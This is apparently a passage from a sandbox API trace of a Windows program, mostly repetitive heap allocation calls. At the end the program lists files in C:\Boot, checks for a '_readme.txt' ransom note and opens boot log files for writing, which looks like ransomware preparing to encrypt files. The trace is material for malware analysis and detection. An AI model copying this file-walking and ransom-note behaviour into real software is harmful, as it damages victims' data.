hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.343] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cf950 | out: hHeap=0x630000) returned 1 [0094.343] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33308b0 | out: hHeap=0x630000) returned 1 [0094.343] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33308b0 [0094.343] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0094.343] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.343] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33308b0 | out: hHeap=0x630000) returned 1 [0094.343] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33308b0 [0094.343] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0094.343] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.343] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33308b0 | out: hHeap=0x630000) returned 1 [0094.343] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33308b0 [0094.343] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0094.343] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0094.343] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33308b0 | out: hHeap=0x630000) returned 1 [0094.343] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33308b0 [0094.343] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0094.343] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0094.343] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33308b0 | out: hHeap=0x630000) returned 1 [0094.344] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33308b0 [0094.344] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0094.344] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.344] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33308b0 | out: hHeap=0x630000) returned 1 [0094.344] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33308b0 [0094.344] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0094.344] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.344] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33308b0 | out: hHeap=0x630000) returned 1 [0094.344] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33308b0 [0094.344] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0094.344] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.344] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33308b0 | out: hHeap=0x630000) returned 1 [0094.344] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33308b0 [0094.344] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0094.344] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.344] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33308b0 | out: hHeap=0x630000) returned 1 [0094.344] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33308b0 [0094.344] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0094.344] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.344] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33308b0 | out: hHeap=0x630000) returned 1 [0094.344] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33308b0 [0094.344] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0094.344] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.344] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33308b0 | out: hHeap=0x630000) returned 1 [0094.344] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33308b0 [0094.344] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0094.344] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.344] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33308b0 | out: hHeap=0x630000) returned 1 [0094.344] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33308b0 [0094.344] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0094.345] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.345] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33308b0 | out: hHeap=0x630000) returned 1 [0094.345] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33308b0 [0094.345] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0094.345] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.345] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33308b0 | out: hHeap=0x630000) returned 1 [0094.345] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33308b0 [0094.345] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0094.345] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.345] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33308b0 | out: hHeap=0x630000) returned 1 [0094.345] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33308b0 [0094.345] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0094.345] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.345] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33308b0 | out: hHeap=0x630000) returned 1 [0094.345] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33308b0 [0094.345] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0094.345] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x32cf950 [0094.345] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.345] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cf950 | out: hHeap=0x630000) returned 1 [0094.345] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33308b0 | out: hHeap=0x630000) returned 1 [0094.345] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33308b0 [0094.345] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0094.345] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.345] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33308b0 | out: hHeap=0x630000) returned 1 [0094.345] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33308b0 [0094.345] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0094.346] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x32cf950 [0094.346] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.346] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cf950 | out: hHeap=0x630000) returned 1 [0094.346] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33308b0 | out: hHeap=0x630000) returned 1 [0094.346] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33308b0 [0094.346] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0094.346] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0094.346] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33308b0 | out: hHeap=0x630000) returned 1 [0094.346] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33308b0 [0094.346] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0094.346] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0094.346] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33308b0 | out: hHeap=0x630000) returned 1 [0094.346] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33308b0 [0094.346] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0094.346] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.346] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33308b0 | out: hHeap=0x630000) returned 1 [0094.346] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33308b0 [0094.346] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0094.346] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.346] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33308b0 | out: hHeap=0x630000) returned 1 [0094.346] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33308b0 [0094.346] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0094.346] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x32cf950 [0094.346] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.346] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cf950 | out: hHeap=0x630000) returned 1 [0094.347] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33308b0 | out: hHeap=0x630000) returned 1 [0094.347] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33308b0 [0094.347] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0094.347] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.347] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33308b0 | out: hHeap=0x630000) returned 1 [0094.347] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33308b0 [0094.347] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0094.347] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.347] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33308b0 | out: hHeap=0x630000) returned 1 [0094.347] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33308b0 [0094.347] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0094.347] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.347] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33308b0 | out: hHeap=0x630000) returned 1 [0094.347] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33308b0 [0094.347] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0094.347] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.347] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33308b0 | out: hHeap=0x630000) returned 1 [0094.347] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33308b0 [0094.347] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0094.347] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.347] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33308b0 | out: hHeap=0x630000) returned 1 [0094.347] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33308b0 [0094.347] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0094.347] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.347] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33308b0 | out: hHeap=0x630000) returned 1 [0094.348] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33308b0 [0094.348] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0094.348] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.348] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33308b0 | out: hHeap=0x630000) returned 1 [0094.348] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33308b0 [0094.348] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0094.348] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.348] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33308b0 | out: hHeap=0x630000) returned 1 [0094.348] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33308b0 [0094.348] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0094.348] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.348] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33308b0 | out: hHeap=0x630000) returned 1 [0094.348] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33308b0 [0094.348] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0094.348] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x32cf950 [0094.348] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.348] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cf950 | out: hHeap=0x630000) returned 1 [0094.348] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33308b0 | out: hHeap=0x630000) returned 1 [0094.348] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33308b0 [0094.348] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0094.348] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.348] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33308b0 | out: hHeap=0x630000) returned 1 [0094.348] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33308b0 [0094.348] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0094.348] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0094.348] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33308b0 | out: hHeap=0x630000) returned 1 [0094.348] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33308b0 [0094.349] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0094.349] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0094.349] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33308b0 | out: hHeap=0x630000) returned 1 [0094.349] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33308b0 [0094.349] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0094.349] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.349] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33308b0 | out: hHeap=0x630000) returned 1 [0094.349] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33308b0 [0094.349] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0094.349] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.349] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33308b0 | out: hHeap=0x630000) returned 1 [0094.349] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33308b0 [0094.349] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0094.349] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x32cf950 [0094.349] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.349] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cf950 | out: hHeap=0x630000) returned 1 [0094.349] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33308b0 | out: hHeap=0x630000) returned 1 [0094.349] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33308b0 [0094.349] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0094.349] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.349] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33308b0 | out: hHeap=0x630000) returned 1 [0094.349] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33308b0 [0094.349] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0094.349] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.349] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33308b0 | out: hHeap=0x630000) returned 1 [0094.349] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33308b0 [0094.349] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0094.349] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.349] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33308b0 | out: hHeap=0x630000) returned 1 [0094.350] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33308b0 [0094.350] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0094.350] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.350] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33308b0 | out: hHeap=0x630000) returned 1 [0094.350] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33308b0 [0094.350] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0094.350] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.350] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33308b0 | out: hHeap=0x630000) returned 1 [0094.350] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33308b0 [0094.350] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0094.350] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.350] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33308b0 | out: hHeap=0x630000) returned 1 [0094.350] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33308b0 [0094.350] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0094.350] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.350] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33308b0 | out: hHeap=0x630000) returned 1 [0094.350] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33308b0 [0094.350] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0094.350] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33308b0 | out: hHeap=0x630000) returned 1 [0094.350] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0094.350] PathFindFileNameW (pszPath="") returned="" [0094.350] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75670000 [0094.351] GetProcAddress (hModule=0x75670000, lpProcName="SHGetFolderPathW") returned 0x756f5708 [0094.351] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x32faf28 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0094.351] FreeLibrary (hLibModule=0x75670000) returned 1 [0094.351] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33308d8 | out: hHeap=0x630000) returned 1 [0094.351] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32faf28 | out: hHeap=0x630000) returned 1 [0094.351] PathAppendW (in: pszPath="C:\\Boot\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\_readme.txt") returned 1 [0094.351] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.351] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33308d8 | out: hHeap=0x630000) returned 1 [0094.352] PathFileExistsW (pszPath="C:\\Boot\\_readme.txt") returned 1 [0094.352] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.352] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33308d8 [0094.352] FindFirstFileW (in: lpFileName="C:\\Boot\\*", lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa17023e0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa17023e0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x670618 [0094.352] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33308d8 | out: hHeap=0x630000) returned 1 [0094.352] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa17023e0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa17023e0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0094.352] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac2e8a60, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x2ebf9340, ftLastAccessTime.dwHighDateTime=0x1d4d597, ftLastWriteTime.dwLowDateTime=0x2ebf9340, ftLastWriteTime.dwHighDateTime=0x1d4d597, nFileSizeHigh=0x0, nFileSizeLow=0x6000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BCD", cAlternateFileName="")) returned 1 [0094.352] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33308d8 [0094.352] PathFindExtensionW (pszPath="C:\\Boot\\BCD") returned="" [0094.352] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33308d8 | out: hHeap=0x630000) returned 1 [0094.352] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac2e8a60, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac2e8a60, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x469b3b00, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0x5400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BCD.LOG", cAlternateFileName="")) returned 1 [0094.352] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33308d8 [0094.352] PathFindExtensionW (pszPath="C:\\Boot\\BCD.LOG") returned=".LOG" [0094.352] CreateFileW (lpFileName="C:\\Boot\\BCD.LOG" (normalized: "c:\\boot\\bcd.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0094.353] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33308d8 | out: hHeap=0x630000) returned 1 [0094.353] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac30ebc0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BCD.LOG1", cAlternateFileName="BCD~1.LOG")) returned 1 [0094.353] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33308d8 [0094.353] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33173a0 [0094.353] HeapFree (in: hHeap=0x630000, dwFlags=0x0, 